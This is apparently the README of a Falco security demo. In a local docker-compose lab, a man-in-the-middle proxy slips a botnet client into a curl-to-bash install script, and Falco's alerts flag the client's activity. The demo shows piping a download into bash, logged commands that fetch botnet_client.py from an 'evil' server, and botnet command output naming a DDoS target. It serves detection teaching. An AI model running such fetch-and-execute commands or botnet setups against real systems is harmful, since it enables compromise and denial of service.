mirror of
https://github.com/falcosecurity/falco.git
synced 2026-04-05 03:22:41 +00:00
79 lines
3.4 KiB
Markdown
79 lines
3.4 KiB
Markdown
# Demo of falco with man-in-the-middle attacks on installation scripts
|
|
|
|
For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
|
|
|
|
## Demo architecture
|
|
|
|
### Initial setup
|
|
|
|
Make sure no prior `botnet_client.py` processes are lying around.
|
|
|
|
### Start everything using docker-compose
|
|
|
|
From this directory, run the following:
|
|
|
|
```
|
|
$ docker-compose -f demo.yml up
|
|
```
|
|
|
|
This starts the following containers:
|
|
* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
|
|
* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
|
|
* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
|
|
* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
|
|
* falco: will detect the activities of botnet_client.py.
|
|
|
|
### Download `install-software.sh`, see botnet client running
|
|
|
|
Run the following to fetch and execute the installation script,
|
|
which also installs the botnet client:
|
|
|
|
```
|
|
$ curl http://localhost/install-software.sh | bash
|
|
```
|
|
|
|
You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).
|
|
|
|
Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
|
|
|
|
```
|
|
$ ps auxww | grep python
|
|
...
|
|
root 19983 0.1 0.4 33992 8832 pts/1 S 13:34 0:00 python ./botnet_client.py
|
|
|
|
$ telnet localhost 1234
|
|
Trying ::1...
|
|
Trying 127.0.0.1...
|
|
Connected to localhost.
|
|
Escape character is '^]'.
|
|
```
|
|
|
|
You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
|
|
|
|
```
|
|
attacker_botnet_master | Trying to contact compromised machine...
|
|
attacker_botnet_master | Waiting for botnet command and control commands...
|
|
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
|
|
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
|
|
```
|
|
|
|
At this point, kill the botnet_client.py process to clean things up.
|
|
|
|
### Run installation script again using `fbash`, note falco warnings.
|
|
|
|
If you run the installation script again:
|
|
|
|
```
|
|
curl http://localhost/install-software.sh | ./fbash
|
|
```
|
|
|
|
In the docker-compose output, you'll see the following falco warnings:
|
|
|
|
```
|
|
falco | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
|
|
falco | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
|
|
falco | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
|
|
falco | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
|
|
falco | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
|
|
```
|